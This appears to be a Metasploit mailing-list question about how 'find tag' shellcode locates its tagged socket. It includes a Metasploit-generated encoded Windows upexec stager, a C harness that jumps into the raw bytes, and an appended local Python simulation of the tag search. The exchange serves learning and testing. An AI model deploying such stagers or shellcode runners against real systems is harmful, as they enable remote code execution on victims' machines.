Metasploit mailing list archives

Understanding Find Tag shellcode


From: cr01nk zer0 <cr01nk () gmail com>
Date: Mon, 23 Nov 2009 02:02:00 -0500

Hi,

Could anybody help me in understanding the find tag class of shellcodes?

How to find the 4 byte connection tag (I think that the first 119 byte shellcode
is implementing a connection tag), and
how to implement it in a shellcode testing code?
===================================================================================================
#include <stdio.h>
#include <string.h>

/*
 * windows/upexec/find_tag - 119 bytes (stage 1)
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * TAG=0BoU, EXITFUNC=thread,
 * PEXEC=c:\windows\system32\calc.exe
 */

unsigned char buf[] =
"\x33\xc9\xb1\x18\xbf\xed\xc2\xfb\x72\xdb\xc3\xd9\x74\x24\xf4"
"\x5d\x31\x7d\x0e\x03\x7d\x0e\x83\x28\xc6\x19\x87\x4e\xf4\x22"
"\x0c\x25\xbc\xec\x46\x79\x4f\x86\x01\x65\xc4\x83\x3a\xe6\xfa"
"\x1e\x91\x46\xf8\x66\xd7\x64\xcd\x39\x15\xfd\xde\x4d\x32\xf5"
"\xab\x17\xf9\x8e\xe0\x92\x79\x1b\xb4\x91\x65\x90\x19\x83\xa9"
"\xa5\x7c\xd0\xbd\x80\x5a\x80\x5b\x95\x29\xda\xf2\x71\x51\x45"
"\xff\xc1\xfa\x76\x2a\x6c\x81\x49\xa1\x80\x13\x1b\xfc\x50\x76"
"\xca\x57\x97\xa5\x5f\x6a\x57\x08\xcf\xc0\xe2\x51\xf0\x0d";

int main()
{
 /* Treat the stager bytes as a function and jump to them. The buffer must
  * live in executable memory for this to work; on a DEP/NX build the call
  * faults instead of running the stager. */
 void (*c0de)();
 printf("Stager Shellcode Test\n");
 c0de = (void (*)())buf;
 c0de();
 return 0;
}
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
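As an added illustration of the mechanism asked about above (not code from the post or from Metasploit itself), the following Python simulates what a find_tag stager does once it runs: it peeks at the first bytes pending on each candidate descriptor, ignores every descriptor whose head does not match the 4-byte tag, and once it finds the match it consumes the tag so that the bytes following it (the stage) are what the next read returns. The real stager is x86 assembly that walks raw descriptor numbers in the exploited process; here the candidates are Python socket objects from socketpair(), the tag is the `TAG=0BoU` value from the payload comment, and the stage bytes are a constructed placeholder.

```python
import socket

# Tag from the payload comment in the post (TAG=0BoU). Everything below is an
# added illustration, not Metasploit's own code: the real stager is x86
# assembly that iterates raw descriptor numbers rather than socket objects.
TAG = b"0BoU"


def find_tagged_socket(candidates, tag=TAG):
    """Return the first socket whose pending bytes begin with `tag`.

    This is the search the find_tag stager performs: peek at the head of
    each descriptor without consuming it, and only read for real once the
    tag matches. After a match the tag itself is consumed so the next read
    yields the stage that follows it.
    """
    for sock in candidates:
        sock.setblocking(False)
        try:
            head = sock.recv(len(tag), socket.MSG_PEEK)
        except BlockingIOError:
            continue            # nothing buffered on this descriptor yet
        except OSError:
            continue            # not a usable socket; the stager skips it too
        if head == tag:
            sock.recv(len(tag))  # drop the tag; the stage is what remains
            return sock
    return None


def demo():
    """Constructed scenario: three sockets, only the second carries the tag.

    Returns (index of the matched socket, bytes left after the tag).
    """
    pairs = [socket.socketpair() for _ in range(3)]
    ours = [a for a, _ in pairs]
    peers = [b for _, b in pairs]
    stage = b"<stage-2 bytes go here>"    # constructed placeholder, not a payload

    peers[0].send(b"HTTP/1.1 200 OK\r\n")  # unrelated traffic: head does not match
    peers[1].send(TAG + stage)             # the handler's tagged stream
    # peers[2] sends nothing: a peek on it would block, so it is skipped

    match = find_tagged_socket(ours)
    index = ours.index(match) if match is not None else -1
    remainder = match.recv(1024) if match is not None else b""
    for s in ours + peers:
        s.close()
    return index, remainder


if __name__ == "__main__":
    idx, rest = demo()
    print("tagged socket index:", idx, "bytes after tag:", rest)
```

The point for a test harness is that the stager never needs to know which descriptor the connection arrived on: the handler side simply writes the tag followed by the stage, and any descriptor whose stream does not start with those 4 bytes is passed over.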
